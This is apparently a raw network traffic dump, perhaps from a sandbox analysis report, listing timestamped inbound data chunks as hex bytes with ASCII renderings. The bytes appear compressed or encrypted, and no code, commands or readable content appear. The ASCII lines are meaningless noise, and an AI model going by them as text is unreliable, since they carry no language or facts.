                                                                                              2021-12-13 23:57:11 UTC1087INData Raw: d3 40 c6 67 89 eb 69 dd 5d 9a dc 2d 22 2a f9 69 7b 8a 76 00 e0 ae 9e ab e1 c5 ef 9a e8 db 37 37 8c 17 e3 c2 fc 86 12 1a 4b 2d ec 6e 0b fb 48 53 25 b8 77 0e aa 12 f8 c6 93 86 0b 22 de 8a 1d d3 7c e9 90 76 3f a6 15 3b 09 b4 1f 44 b1 6b 6b 50 05 54 38 d3 3c 32 7a 71 37 79 ee 89 2a 24 6c 26 a4 98 4d 80 ae 5f 86 cc 66 0f 26 7a aa 30 c4 32 ac 6c 4a 4a 02 fb a2 68 c7 87 2a 3f 03 35 05 87 76 cd 42 e9 18 59 b4 e3 1b 95 ef 87 3c b8 01 cc 80 b2 04 51 91 aa 3f 0b 57 64 c5 8a 36 a8 fc ef 58 51 22 d3 8a 5b a9 b8 b9 68 c7 1e 95 3f 31 87 58 f4 e1 33 ba 2b cc 03 ad 50 e5 ee 7e e8 7a 05 5a cd 60 7e ed 2d 66 bc 0e a5 46 eb 50 2a 15 71 57 01 99 f6 a3 a6 5c 42 49 54 95 fb 88 a7 44 2b c3 b3 d6 20 8c eb 0d db 2b 38 12 5f a9 dc 47 88 83 76 94 2d 41 d3 0c fd ab b2 0f 20 1a 5c c7
                                                                                              Data Ascii: @gi]-"*i{v77K-nHS%w"|v?;DkkPT8<2zq7y*$l&M_f&z02lJJh*?5vBY<Q?Wd6XQ"[h?1X3+P~zZ`~-fFP*qW\BITD+ +8_Gv-A \
                                                                                              2021-12-13 23:57:11 UTC1103INData Raw: ff bf 9a b7 5b 9b ff df cd db cf 4d ff 71 de 36 ab fc bb a6 ff 0f e6 ad 4b fa a5 17 4d 47 2f d6 82 6a d3 67 65 0e cd 4a 41 94 6e f7 d8 3b 5d cc 08 29 91 2c 3f a6 cd c8 00 98 91 7e 9d 67 a4 41 34 30 92 06 94 22 06 64 4e 41 f7 3a 45 3b fe a1 f2 be 34 16 73 8a 18 ca 4a 7d 24 62 20 11 fd 0c 5c ac 9f 91 32 da 1a 26 6b 88 0d 6b 6e 5e b9 b3 5e 97 de 97 85 f4 be bb 43 e8 7b 36 92 f8 e6 6c 43 7c 53 f6 b4 bb 6e 37 c9 97 e9 16 f2 85 01 92 ac 0e 94 29 ea 2d 74 9e 76 af 21 1e e7 10 43 99 f4 ce ef 8f 21 cf a4 1f dd 7d b5 7c a1 2a 8c a0 c4 22 aa 1c 34 67 4e 55 1e 45 21 e8 ae f2 ce da ab 11 00 b2 61 ad aa 24 8d 97 e0 e2 51 e6 91 3e 7c a9 25 59 ce d3 42 57 c9 93 74 4d 84 7b f6 12 d9 3b 96 c7 7e 4c 81 6b 35 da c0 51 50 20 0f a3 bb eb d7 7f c7 09 eb 79 fd d0 ff 13 40 ef 4b
                                                                                              Data Ascii: [Mq6KMG/jgeJAn;]),?~gA40"dNA:E;4sJ}$b \2&kkn^^C{6lC|Sn7)-tv!C!}|*"4gNUE!a$Q>|%YBWtM{;~Lk5QP y@K
                                                                                              2021-12-13 23:57:11 UTC1104INData Raw: 33 ad 7c fe 4a 55 0d 5e a9 b1 de 2c c4 0f 7c bd 44 55 0d f1 f1 ea 06 43 98 4c 89 0e 2c b1 1a b8 c1 ff 78 4e 22 ce db bf 9e d6 4c 0f 24 d4 88 b3 c6 e3 3b f7 f5 07 b8 d1 eb 00 1f 31 01 2e 43 f2 d7 33 58 52 4a c5 61 f9 1a cd 82 ff a8 23 c7 84 9c d7 25 fe 95 59 28 ee f3 05 12 2d 3f a9 fc 92 23 78 7f 2a e9 e4 ab 45 f9 7c 03 56 c0 af fe 3a 4e 70 c6 31 1f 54 f0 b2 ca 7f 3e 4c f9 06 00 f1 6e db e2 35 6f ed 87 a4 c9 80 1b e8 6a 8b c1 96 25 74 1d 60 8e b0 75 80 9d d7 d8 85 1a f6 77 7a 18 79 62 ae e5 19 9a 1e ea 3f 34 71 14 5b c5 5f 10 ee db b6 4c 35 6f bb 5a 9c e3 6f cb b1 6a 21 91 92 a6 a2 47 37 7f 68 e0 ca 3e f2 d5 e8 54 79 84 9f c7 ca fd fc dc 2c 0f 0e 0e f5 d7 1c 86 d0 e2 9e 7e 1e 25 db 83 7d 48 56 2c 68 25 7f 1a c1 98 0f f0 31 15 86 3d b1 44 a2 da 07 89 da 57
                                                                                              Data Ascii: 3|JU^,|DUCL,xN"L$;1.C3XRJa#%Y(-?#x*E|V:Np1T>Ln5oj%t`uwzyb?4q[_L5oZoj!G7h>Ty,~%}HV,h%1=DW
                                                                                              2021-12-13 23:57:11 UTC1120INData Raw: 17 08 a9 fe c0 da f1 45 f0 d4 1e 50 e4 41 0f 16 c3 bf e3 a7 14 c2 ab 2a 7a b5 e6 c9 20 21 e1 43 bf b9 81 46 22 0a ab b8 81 84 16 b1 a7 c3 9b 74 fa 0b 2d 50 97 3f fe d6 27 75 ba 8b 2d d4 9a 02 ab 4c 9e ef 53 7c 3f e6 14 5e 56 ec 79 f5 55 d0 4b d9 62 e1 dc 19 d6 0d f9 24 0b 2a cd 74 19 5c 0d b2 6f 85 65 04 3e c9 a6 16 5f df 08 83 e6 41 c8 c7 3a 90 5d d0 9c a8 3b 30 72 73 01 8a 3b cd e2 fb 97 fa 24 ec 35 b8 9e 1e 26 8d c6 47 78 75 38 40 b0 47 b5 87 e8 70 84 c4 b5 e3 32 70 aa 18 92 7a 36 e4 00 fe 16 41 78 17 52 bb 42 52 db d9 ef 2e 7c 52 b8 59 0c 41 c9 09 1f 17 56 8b 01 35 1d 92 50 d1 5d 6f a6 07 ff ac 1a d9 fc 19 a8 91 9d 12 c7 6e 64 3a d8 9a fb 6c 6b e9 ec 3e 95 ed fd 83 3c bb f7 0f 46 ad e8 90 5a e2 55 8a 43 f1 6a fa 24 c1 d3 1f 5d 90 f0 e9 33 6f f1 45 fa
                                                                                              Data Ascii: EPA*z !CF"t-P?'u-LS|?^VyUKb$*t\oe>_A:];0rs;$5&Gxu8@Gp2pz6AxRBR.|RYAV5P]ond:lk><FZUCj$]3oE
                                                                                              2021-12-13 23:57:11 UTC1121INData Raw: 23 29 35 b1 25 ae 0b cf 66 d3 f5 c0 c6 26 24 b8 9c 12 b4 b0 52 ec db 00 04 e9 d7 1c 4a f0 5c 34 12 c4 b2 e6 89 88 fc dc 82 f3 d2 2b 11 f0 f3 2d c5 8e de 67 e6 13 f1 8b 2e 8b f4 0a ad 21 9f df e9 a5 cc bc d3 30 d9 3f fe 9b 24 d1 ca a3 b7 df fc 93 61 5a 8a b8 0a 82 e9 28 ac e5 3a 25 ab c8 55 cb dc 59 78 e5 6a 08 57 6b 7d 20 bc b0 95 86 b3 d6 7a 4b 21 5e ba d3 87 e1 50 db 3f eb bf eb 93 5e c1 36 cd 0b 9c 03 99 f9 f1 4e 7c be 7a 47 b9 31 86 88 ee e9 16 e4 74 da bd 81 97 97 92 7d c1 f0 87 f9 7f 98 06 fe 27 4d fe 79 61 10 23 59 fc 16 a2 bc 82 97 fe ad 13 c7 a3 51 6c c5 f6 ec 03 f4 b4 9b d8 f6 00 9b 40 42 4b f0 88 0e 3b 5d 22 8f 4f b4 73 11 4b 8c 30 26 4b 48 1e 8c d4 9b 61 8c 46 92 0c 64 ed 56 1c 3c ea a8 23 c5 a4 88 98 48 29 c0 42 b2 88 ac 22 65 56 5c fb 38 f6
                                                                                              Data Ascii: #)5%f&$RJ\4+-g.!0?$aZ(:%UYxjWk} zK!^P?^6N|zG1t}'Mya#YQl@BK;]"OsK0&KHaFdV<#H)B"eV\8
                                                                                              2021-12-13 23:57:11 UTC1137INData Raw: d7 99 70 b9 b1 e4 ba 1f d5 54 5b c9 1f 58 84 14 8b 83 af df 44 f3 fa 92 5a d2 ad 79 53 2c 75 5f e3 05 23 c9 b9 6e 5b 71 35 9a fd ed 20 6d 91 ad 04 9b af d2 83 1f 26 9a 13 8d df 48 f4 f0 eb 9f 48 af 9d 37 9f 52 eb d6 1b c0 8b 57 e3 a8 97 d1 a0 ad 25 e1 e2 4e 05 df 07 c0 59 fc 42 ec 05 55 60 62 be 05 6d e4 72 e8 27 43 0c 52 78 3d b0 ec 39 27 74 29 10 a5 70 bb 21 98 43 f0 98 13 ba 5c 17 ff 97 e2 f7 2d 27 7f 55 69 81 89 7f 68 e8 f0 bb 0e e1 18 c0 8d 72 78 b6 2a 74 8a 4d 35 81 72 b8 5f d7 aa 93 d1 75 a8 3b 6a ba 40 8a 87 03 c0 84 5e b1 b8 ba 42 fd 98 f3 0f 8b 99 d5 e7 4d 58 3f 4f 6c d2 e6 8c c8 e7 eb 90 cf f3 47 a1 a7 43 ee ba e6 9b 20 b3 58 a5 e0 f7 22 41 7f f3 ee 29 55 8e 15 48 00 7a 5a 7e 8e 8b 3a 80 66 9a 6b 0f da 72 41 94 e9 ce 9f 2e a8 fe f9 f9 93 90 c6
                                                                                              Data Ascii: pT[XDZyS,u_#n[q5 m&HH7RW%NYBU`bmr'CRx=9't)p!C\-'Uihrx*tM5r_u;j@^BMX?OlGC X"A)UHzZ~:fkrA.
                                                                                              2021-12-13 23:57:11 UTC1138INData Raw: bc 2a 44 85 15 13 2c 2c 46 d7 c5 bf 2a 75 f1 e8 f2 57 37 ea ba 7d 6c a9 fa 65 40 ba 9f 7c 40 35 10 0b 1e 8e 48 6f 5a a4 e2 88 f0 a6 45 28 0e 8b 37 cd a2 24 59 bd c9 56 31 3a 45 68 c9 37 64 35 08 3e 9e e7 59 dc 1d 58 32 e0 aa 56 92 7b aa 69 d1 d3 2b 3c 3f a1 79 48 d7 31 ce de 63 9c f1 be 9b 13 53 23 9d 03 bc a9 91 14 bf 22 31 35 c2 19 eb 4d 8d d0 be 2c ce ae de 54 8b f6 65 75 5a bd a9 56 f1 25 c7 88 95 85 d4 87 a2 b0 0f b9 69 76 94 16 99 f8 60 39 96 52 ef 44 ba dc 32 ae 45 a8 74 11 f6 84 80 55 1e 7f 01 07 4b cf cf b5 aa 3f 82 d4 2d 8a 42 25 61 f5 62 94 a3 fc f3 70 59 67 d4 27 f5 3e b3 0b 08 a4 34 03 d5 c0 a8 48 de 08 83 d3 fa a8 63 d3 99 37 f9 ce ed 63 c5 00 da 30 46 5b 20 ab e0 d1 63 69 81 ac 82 2f 6f c4 97 f5 3d 3b e6 30 de ed 7e 2b 53 1a bc 9b 70 ea e7
                                                                                              Data Ascii: *D,,F*uW7}le@|@5HoZE(7$YV1:Eh7d5>YX2V{i+<?yH1cS#"15M,TeuZV%iv`9RD2EtUK?-B%abpYg'>4Hc7c0F[ ci/o=;0~+Sp
                                                                                              2021-12-13 23:57:11 UTC1154INData Raw: d7 73 4f a3 3d c9 2b d7 4c 63 b5 f0 b8 17 8f 27 f9 f8 05 80 a9 ef 33 8d a5 af 02 99 7a d0 d4 00 f9 d8 7d d3 d4 36 73 cf e6 4c 21 1f 97 5e 37 8d 6d 83 38 3d 13 a7 b2 18 70 97 c2 13 0b cf e2 eb a7 b1 b5 80 3f 1a 70 ed 84 27 1a 70 54 c3 73 e2 e6 a9 2c 73 f0 54 d6 e7 96 a9 ac 18 9e 7a 78 c6 0d 01 18 78 fa 01 8e 17 ae 9d c6 56 0f 9d ca f2 af 9f 46 72 d9 fc 4c 21 97 f5 81 19 57 ea 9c f9 ce e1 b3 51 98 bb 89 d2 6f 23 6f 6d c8 fc 4b 79 0b eb 2d d4 88 06 2b b6 df 55 d3 34 63 8a 34 67 0e f8 cf 5f 68 22 13 a8 62 98 fa 94 02 ad 1a ad c8 cc cc 82 b1 4d cc fc 69 a6 36 03 33 9e f3 70 68 a4 61 8c 1b fd 49 b3 5a 99 32 47 1b d2 3a d8 2f 76 ae c3 d0 69 30 9f 8a 4c 4f 06 01 b6 e0 9e 91 85 33 17 a5 39 67 de 95 ab 2b 43 06 43 70 f8 ec 1c 10 8c 1d 33 21 e1 76 f0 5a b0 d0 49 ef
                                                                                              Data Ascii: sO=+Lc'3z}6sL!^7m8=p?p'pTs,sTzxxVFrL!WQo#omKy-+U4c4g_h"bMi63phaIZ2G:/vi0LO39g+CCp3!vZI
                                                                                              2021-12-13 23:57:11 UTC1155INData Raw: f0 bb 36 8b 45 0c 0c d4 ff 36 5f 21 f4 bf 7b 9e ca d6 75 54 eb d6 66 b7 d1 ff 8e 4c c9 62 d5 33 85 fe b7 78 b6 5f 47 d5 27 4e e8 7f 9d 83 20 ee 4d 10 07 f2 ef bc c9 af a3 6a 5a 0d b4 f9 02 f8 c1 f3 0a 3c 07 5f 30 ee c3 39 91 3b 9c 9d 30 69 75 6b 13 6a 1a 3c 23 a2 5d ca f0 79 f3 0a 16 c1 4f c6 02 a9 bd c1 43 c0 c2 52 86 bb 9c 05 82 5d 90 e7 d7 e0 19 9c 82 5d 49 7a 1c 33 e1 6e 96 51 85 05 ae 05 b4 67 66 1f a4 70 9c 10 8e be 67 e6 5d b9 da 2e 1c 2d e1 70 e1 3d 61 e6 3d 1a c6 5a 13 2a 97 02 46 33 19 72 ca 84 d4 26 46 3c f0 3a 9e 93 c3 38 e5 69 7c ee 7c d7 68 67 2e f2 b8 f2 c5 39 ac de 84 6a 26 ec e2 39 90 2f 0c 94 08 1a 20 c0 96 62 9f 8f a3 ac 16 ac a9 a6 a8 1c 53 0b 67 2e 08 12 8c e3 37 13 6e 11 22 86 22 59 25 de 91 18 21 b4 57 b9 c9 05 2e a4 78 53 e9 52 68
                                                                                              Data Ascii: 6E6_!{uTfLb3x_G'N MjZ<_09;0iukj<#]yOCR]]Iz3nQgfpg].-p=a=Z*F3r&F<:8i||hg.9j&9/ bSg.7n""Y%!W.xSRh
                                                                                              2021-12-13 23:57:11 UTC1171INData Raw: e2 a4 24 ec a9 f8 2b bc d7 00 cc 95 80 b7 a7 8e 2d 30 5c 2a 59 c8 26 bb 49 f9 ca 9b 1e 6b 51 1a 2a 2d b1 26 98 2a f6 ca f3 ec a2 bc 38 3b a7 e3 81 52 ca 51 65 e5 50 1a ec f0 f6 32 08 24 84 ce e8 34 b1 fe 35 2e 36 02 21 e2 09 02 ef 49 b3 6d b1 c4 4e cb 0a b0 69 c4 53 34 cf 91 59 8e 32 23 a2 d2 fe 27 26 13 0b 98 28 eb ce ee 58 c7 40 3e 7f 3a f0 70 44 c0 35 92 70 25 89 d4 28 d3 ce 2b 08 26 0d 55 a6 06 c0 81 04 d8 8f 12 b5 ff a9 99 db 40 ba 42 fa 35 55 68 7a 05 dc bc 33 a3 19 73 81 3a 10 24 a2 dc 5f 34 22 82 fc 30 85 36 d5 f3 7b d6 e3 d6 fd 91 ca 13 24 31 4f 1e 29 4c 64 45 d8 24 0a 4b d5 c2 52 29 ec 4c 72 ae db 79 b9 a6 6f e9 22 41 af 11 a0 c0 3c 9a af 39 af 4a cf 8e e4 99 a4 c5 4f a2 f8 b4 e6 47 03 80 7d 03 4e db b9 7a 57 ad 66 59 6d 2b fe 08 7b eb d8 6c 25
                                                                                              Data Ascii: $+-0\*Y&IkQ*-&*8;RQeP2$45.6!ImNiS4Y2#'&(X@>:pD5p%(+&U@B5Uhz3s:$_4"06{$1O)LdE$KR)Lryo"A<9JOG}NzWfYm+{l%
                                                                                              2021-12-13 23:57:11 UTC1172INData Raw: 05 26 43 bb cc c6 2e 22 fb ff d3 94 c0 bb 26 de 05 12 a0 26 be 51 ab eb 6b b4 9a ed a4 bd 44 89 d6 c7 03 49 a1 f5 93 d2 a1 93 f9 82 71 fc d9 ac a4 64 7a ed 3b 71 07 67 25 bf 71 64 4b 1b 3e 33 f5 e9 bf e2 33 1a 6d 44 51 06 3a 10 72 87 67 8f c5 6b df e6 bb 4e 62 e8 82 18 32 9a 79 2e e4 53 22 50 a6 64 7f 7e 0e de 0e 01 16 6f c6 36 09 58 ff 0f 01 38 14 00 cd f6 6d 5e fb 1e 19 70 f8 1f 62 f4 14 0d 71 75 d4 c5 1a e2 6d 01 23 1a 22 28 4a af f3 a7 c0 9f 07 0d c0 4d 2e 07 95 a2 e6 12 d5 19 ec 39 6d 51 6e cb 0f 5e 81 fb bd 37 3b a6 a2 ec f9 de d1 93 38 c5 39 e8 e0 57 ad c1 c3 71 73 dd b6 e2 ae 7a 65 63 5a b1 e6 94 74 d1 79 75 af 7e ca 7e f3 04 87 32 25 5d 49 71 70 25 0f 47 46 8e e6 4d 41 02 8c 34 31 a5 fd 51 b3 76 79 0c f2 fe 5a 54 8f de f0 8b a6 1e cd 8f 61 07 19
                                                                                              Data Ascii: &C."&&QkDIqdz;qg%qdK>33mDQ:rgkNb2y.S"Pd~o6X8m^pbqum#"(JM.9mQn^7;89WqszecZtyu~~2%]Iqp%GFMA41QvyZTa
                                                                                              2021-12-13 23:57:11 UTC1188INData Raw: 25 ad 55 b9 0e 76 2d 03 a2 4a f3 06 47 14 3d c2 57 ef b5 31 24 a7 56 4a 15 a8 49 81 f2 c6 74 5b 28 aa 89 02 a8 ad f8 66 b2 56 3e b6 99 96 f5 43 9b 71 fe 9e c2 ce 73 58 c4 a6 b2 42 6e 9f fc 4c 39 a7 7c aa 7c a2 9c 55 3e 56 3e 52 7e ab fc 46 39 a3 7c a8 fc a7 f2 6b e5 b4 f2 2b e5 1c 0c 12 ff 53 12 bb 09 52 03 a4 ed 90 1e 85 74 02 d2 19 48 cd cf c1 c0 3d 2c b1 e8 80 c4 0e 42 62 cf 00 3d 9f 97 d8 ec 17 60 f1 71 04 a6 01 48 85 41 fa 3e 87 be 85 9b cb 07 9f 6d 4a 2b b9 6b 0c 8b 67 ff 93 4e db 08 53 31 44 cb 7a da c9 e2 69 41 9b cf 07 bb dd e2 59 72 d7 58 16 4f c6 b8 fe f2 da 9f 0b d5 1c 75 db ac 12 a7 33 f7 a4 bf e3 13 df b7 08 48 04 ba 08 3c 4e e0 1d 02 bf 27 30 a3 83 83 9b 09 48 04 ba 08 3c 4e e0 1d 02 c3 04 8a b6 50 01 02 2b 09 6c 21 f0 18 81 77 08 fc 91 c0
                                                                                              Data Ascii: %Uv-JG=W1$VJIt[(fV>CqsXBnL9||U>V>R~F9|k+SRtH=,Bb=`qHA>mJ+kgNS1DziAYrXOu3H<N'0H<NP+l!w
                                                                                              2021-12-13 23:57:11 UTC1189INData Raw: 7c 2a 79 05 6d 95 0a 4b 2f b2 58 36 27 76 36 f3 ec d9 c6 ed 9f af 12 f8 0f 02 ff 43 e0 ab f7 6a f6 98 c1 7b 75 99 1b 81 eb 81 2e a0 fa 76 89 6d da 4e f9 8f 6e a7 ef 2e 5d 8a cd ab ff a8 6e 6f 3f 09 d7 7d 2f 9b 6d 5e 65 47 c9 de 3e 1b f2 2b 20 45 21 75 be 22 65 b4 81 65 eb 19 be c0 a2 50 42 08 18 72 bf c0 2c c1 4c 08 a2 2f 40 aa 17 85 37 b1 be 9c cb a1 3f 50 13 0f 87 a2 f5 72 0a d4 8e b0 c0 cf 14 2f 15 b4 a7 55 eb 7b 36 7b 65 3b 59 df 2f 6c a7 65 fa 95 5d 64 66 5b d6 45 22 7b 17 ff ed 67 93 d8 0c 83 e8 2c 0c a5 64 1a f0 64 99 2f 3b ea 20 bd 87 ba c6 61 99 ef 3f ea b4 a4 3e d4 65 b1 3e 9c 3c ea 60 df 3b d4 35 aa 7d ef 6a 16 7e 99 07 cc 8c 34 b6 64 ac fa 06 ce 8b 7c 34 51 d0 28 e2 12 95 11 1d e3 ff 77 a1 9f 3a 23 31 06 ef 25 db a1 c7 34 94 3c 9a ed b0 e8 15
                                                                                              Data Ascii: |*ymK/X6'v6Cj{u.vmNn.]no?}/m^eG>+ E!u"eePBr,L/@7?Pr/U{6{e;Y/le]df[E"{g,dd/; a?>e><`;5}j~4d|4Q(w:#1%4<
                                                                                              2021-12-13 23:57:11 UTC1205INData Raw: ce 3e 13 f9 67 16 ff 94 f2 cf 06 fe d9 c1 3f cd fc 13 32 80 7d ae e5 9f 7b f9 a7 9c 7f 36 f0 cf 4e fe 39 c1 3f 03 23 d8 27 81 7f ee e3 9f 6a fe 79 96 7f fe c5 3f df f2 cf 70 2b fb 4c 65 1f 9c 8a fa 76 cd 27 e5 23 b9 14 60 ac 35 45 19 e0 cc 2b 5d 96 57 49 3a 07 9a e5 ab e8 41 b9 64 52 64 2e f9 25 fc 36 c3 6f 2b fc 16 fc 97 b6 8a 2d 57 e4 fe df ba 7f b7 7d 2c 97 af f8 3f 0b 37 b7 9c c8 ae d0 cd c4 7e bc 2c af 44 5c 71 4b 62 96 6b e7 c3 10 2c 5b ae d9 6a 61 a3 21 c0 08 2b b2 39 37 83 89 59 84 0b 0f db 22 b9 f0 70 32 92 0b 0f 43 a0 96 4e 2b 6b c7 a1 a8 c0 a2 de ca 88 e9 27 2a 38 06 fd 07 51 c1 72 45 30 51 c1 14 2d 94 d5 75 84 c8 08 db 01 d3 09 37 cb 09 61 2a e5 4a ea b8 5c d3 0c 16 aa 4d 88 a2 76 94 05 86 10 34 0c 8f af ad 6a 75 89 2a 51 4a c6 99 67 37 0b 51
                                                                                              Data Ascii: >g?2}{6N9?#'jy?p+Lev'#`5E+]WI:AdRd.%6o+-W},?7~,D\qKbk,[ja!+97Y"p2CN+k'*8QrE0Q-u7a*J\Mv4ju*QJg7Q
                                                                                              2021-12-13 23:57:11 UTC1206INData Raw: cc 2b e7 26 af f4 94 5e ef 3e a7 28 69 5d 2c 56 33 7f 91 ce 68 68 61 19 b7 b3 4c 28 cb 24 30 b5 58 25 bd dc 78 27 a9 3b 9d 5b 22 40 fa 73 ac ec 86 58 12 bf 6d f2 0a a3 b6 4f 49 b1 b1 bf d6 9a 63 ab 47 dd 9b 49 43 15 7c 65 e7 ea f3 1d 54 7c ef 28 74 ca b4 36 a5 e6 d8 1a 54 e4 a8 24 b2 90 89 56 b1 77 cd df d2 a8 0a 30 4a fd 42 01 06 53 7e 51 fd 79 9f b2 a9 2f 3a 97 0c 74 2e 7c 39 64 53 f9 01 58 ce 25 fe 14 5f 86 fa b7 e1 96 98 3f 37 7a 7f b2 a3 05 d6 c9 fe dc 78 b9 a1 70 f7 3e 85 8e 7f 8c e9 6a f3 e7 4e 44 40 83 42 47 30 c0 f8 dd c5 fc 1e c9 06 47 9f a2 ba 33 1c 7d 8a a6 03 e3 5e bf 59 07 46 ae 50 42 6f 45 7b 5f b4 ca 2f f4 20 fe 82 3d f6 fb f3 a3 9a 92 c3 db 3e ef 53 95 1c 12 3f bf ab 07 c4 af c3 60 f2 4c 5b cd 41 69 a0 fc 16 53 5d 2b 37 c9 7b 01 57 7f 8f
                                                                                              Data Ascii: +&^>(i],V3hhaL($0X%x';["@sXmOIcGIC|eT|(t6T$Vw0JBS~Qy/:t.|9dSX%_?7zxp>jND@BG0G3}^YFPBoE{_/ =>S?`L[AiS]+7{W
                                                                                              2021-12-13 23:57:11 UTC1222INData Raw: 09 b0 ea 53 7a 36 ef 80 7d 8c 89 30 f1 33 91 61 f4 a0 44 27 8c 35 32 64 0d 14 7e de 08 e9 ba d4 3d 35 1c d6 49 3d 8e 5a 7b 62 c3 e2 c6 9c e9 aa 26 03 2d 2f c3 f1 57 a6 df 46 11 84 35 81 bb 35 2f cc 81 3e 41 29 36 e1 89 e6 b6 16 78 a7 6f 81 99 9f 00 29 cb d6 05 42 5c 4f fa 82 0e 70 52 0c 88 08 10 26 16 8c 59 2e 27 40 9b 93 78 14 4b b3 69 4f c0 13 ed b8 53 3b 47 49 24 4d 44 c7 cf dc cd 5e 11 fc a6 1a 68 86 fe 37 15 c8 d1 c8 77 b5 0f d9 82 88 1d cc 8c d8 5d b5 91 41 5e 3d c6 18 14 4e 2c b7 1b 90 4f e3 57 04 bf f1 96 58 c6 5d 26 a2 55 3f 30 44 ee ef e4 1f 8a 9c d3 ec 1f 72 ce 69 39 4a 49 f6 04 23 1d 6e e9 cc 67 6c 44 56 63 9d 8c 02 a1 c4 4b fc 41 94 ba 90 54 69 ae 85 ea ba 26 d4 b2 ae a3 2d 94 25 0d 4a bc 97 d5 69 27 dc a1 14 8e 79 15 2f 94 d3 de 50 97 a6 52
                                                                                              Data Ascii: Sz6}03aD'52d~=5I=Z{b&-/WF55/>A)6xo)B\OpR&Y.'@xKiOS;GI$MD^h7w]A^=N,OWX]&U?0Dri9JI#nglDVcKATi&-%Ji'y/PR
                                                                                              2021-12-13 23:57:11 UTC1223INData Raw: 59 fa e4 7e 4f 4c 1e 6b 4c 36 de a3 cc 49 63 de 7d 1e b8 ed f5 36 57 d7 db 1c 7d 6f 87 99 92 bf 95 a7 34 26 25 3f 1f 52 ec f5 24 4f d7 93 5c 7d 4f 72 22 d9 fa e8 6b 35 b7 ac 6d 95 f5 3c 5a ae 7e 4c a7 9e 62 19 8b da a3 1c d5 c9 1c 95 b4 e8 9d ac 02 56 69 d1 a3 3d 9d 66 59 82 43 48 5a 37 eb a8 79 fa 74 0e 24 5b 77 4f 64 6e 45 77 29 4b eb 12 67 56 7b 86 cc ac de cd f6 21 5e 5a f3 a8 49 19 f4 9a 64 3c 27 c7 a4 3a 67 e8 bb 60 e0 d5 63 6c c7 e2 a4 24 8f f6 5c 46 67 2b 7b 22 d9 ca 31 5d da c1 66 d5 34 7f f8 9b e2 9d ed d4 e2 fd 6c f6 cd f2 64 47 5b 5f a3 53 68 73 f4 06 37 9e 72 e8 52 68 0d 19 ee ad bb ad f2 60 0d 77 18 43 eb 87 3b d2 65 75 ed 75 c5 59 ae ea be b6 d8 93 21 f7 ec 82 7e 1d df 75 51 9c 57 c8 f2 e5 17 c4 3a 7e 76 b0 d1 f6 3a de f1 7c 64 1d ef 7e de
                                                                                              Data Ascii: Y~OLkL6Ic}6W}o4&%?R$O\}Or"k5m<Z~LbVi=fYCHZ7yt$[wOdnEw)KgV{!^ZId<':g`cl$\Fg+{"1]f4ldG[_Shs7rRh`wC;euuY!~uQW:~v:|d~
                                                                                              2021-12-13 23:57:11 UTC1239INData Raw: e8 2d 87 dc 1a ca 5b c5 ca 48 c7 32 e2 bd 5c b3 b3 16 d2 cb 58 a5 12 5f 03 f9 cb 88 6d 1d a3 be a1 b8 ca bb 8e 95 13 a2 86 d5 84 e4 d5 12 5b 46 71 1b e5 da 48 eb 2a a8 59 13 92 6f 63 f5 8a 4e 4c 3d a5 84 75 6c 45 18 f7 d0 bc 35 21 69 ec d5 32 ea cb 65 0a 0e 7b d7 46 ba d7 43 7e 25 e5 ad 26 76 c1 ba 72 1a ed ad a5 f4 1a 28 29 0f d1 ae e6 ad 87 f6 57 13 6e 29 5b af e5 57 b2 ca b0 7e 5f 4b 96 56 b0 d5 4a ba 5c 99 03 cb 68 84 d7 87 cd a1 ba 18 e5 c1 5e 59 46 fd 58 4f ac 10 87 33 00 79 a9 a3 1d 9c 67 e5 ca 58 ae 09 b3 4c 9d 7f 65 ca b8 46 b6 cc a8 85 e5 4a 9f 56 11 6f 79 ae 05 39 a8 e3 50 c7 2a 95 32 b5 4f 6b 28 5f c6 ac a4 19 8c 3d 84 b3 33 ba 1d 1b 8d c8 32 1a 81 3a ea 21 1b d9 23 8f 7b 25 f1 2d 57 18 54 d0 5a 29 a3 3a 6b 94 fa 85 bc 27 cf dd 78 c6 36 e5 d2
                                                                                              Data Ascii: -[H2\X_m[FqH*YocNL=ulE5!i2e{FC~%&vr()Wn)[W~_KVJ\h^YFXO3ygXLeFJVoy9P*2Ok(_=32:!#{%-WTZ):k'x6
                                                                                              2021-12-13 23:57:11 UTC1240INData Raw: f9 f9 64 9c ef 3d 7c 78 f3 da 52 76 08 ef 3d 62 ef 1e 79 b2 ac 5b 0b 93 e5 f3 25 8b 69 be aa 73 c5 8d 73 e5 8c a3 a4 b7 c9 fc 89 c3 da 03 cc 78 89 01 da 76 6e f0 bd 02 7f d5 b0 2d 3b 05 77 de d1 bc 93 62 c6 ad 7d 12 2e ee 5e 9c c6 c3 ee d5 16 77 66 39 2e b9 2e da a5 72 ca d5 5d aa 37 74 97 ea a5 95 dd 2b a6 96 c5 dc a5 ba 70 97 ea 8d d8 a5 2c f7 87 ec 52 d3 16 53 1b 9a 99 3f ba 17 cd ec 15 67 6f 92 6d 6b 7e 5a 5e d6 5d 97 84 9b 74 b6 34 d7 3c a8 9c 2a a4 7b a7 5c 12 d2 4d 36 83 6b be 9c 86 54 16 a4 16 69 a9 7c 48 95 6a a9 06 48 55 a8 a9 4f 4c b6 34 a0 51 05 e9 26 e1 13 48 67 51 ba 46 4b e7 53 ba 56 4b 37 50 da 26 a7 61 e5 37 6c 84 e3 cd bb 42 07 c4 3d b8 08 47 dc af 2d 42 01 67 59 2b 8d 7c 42 37 4e b5 80 64 f6 83 0a bd 2d ab 75 38 63 12 1c 7f 17 92 d1 e2
                                                                                              Data Ascii: d=|xRv=by[%issxvn-;wb}.^wf9..r]7t+p,RS?gomk~Z^]t4<*{\M6kTi|HjHUOL4Q&HgQFKSVK7P&a7lB=G-BgY+|B7Nd-u8c
